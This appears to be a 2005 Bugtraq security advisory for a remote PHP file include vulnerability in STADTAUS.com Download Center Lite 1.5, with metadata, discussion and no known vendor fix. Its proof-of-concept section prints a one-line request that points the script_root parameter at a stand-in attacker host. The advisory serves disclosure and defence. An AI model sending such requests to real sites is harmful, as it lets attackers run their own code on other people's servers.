BID:12726

Stadtaus.Com Download Center Lite Arbitrary Remote PHP File Include Vulnerability

Info

Stadtaus.Com Download Center Lite Arbitrary Remote PHP File Include Vulnerability

Bugtraq ID:	12726
Class:	Input Validation Error
CVE:
Remote:	Yes
Local:	No
Published:	Mar 04 2005 12:00AM
Updated:	Mar 04 2005 12:00AM
Credit:	Filip Groszynski <[email protected]> is credited with the discovery of this vulnerability.
Vulnerable:	STADTAUS.com Download Center Lite 1.5

Not Vulnerable:

Discussion

Stadtaus.Com Download Center Lite Arbitrary Remote PHP File Include Vulnerability

Download Center Lite is reportedly affected by an arbitrary remote PHP file include vulnerability. This issue is due to the application failing to properly sanitize user supplied input.

This vulnerability affects Download Center Lite version 1.5; earlier versions may also be affected.

Exploit / POC

Stadtaus.Com Download Center Lite Arbitrary Remote PHP File Include Vulnerability

No exploit is required.

The following proof of concept is available:
http://www.example.com/[dir]/inc/download_center_lite.inc.php?script_root=http://[hacker]/

Solution / Fix

Stadtaus.Com Download Center Lite Arbitrary Remote PHP File Include Vulnerability

Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.

References

Stadtaus.Com Download Center Lite Arbitrary Remote PHP File Include Vulnerability

References:

Download Center Lite Homepage (STADTAUS.com)
Download Center Lite (DCL) - Arbitrary File Inclusion (VXSfx) (Filip Groszynski )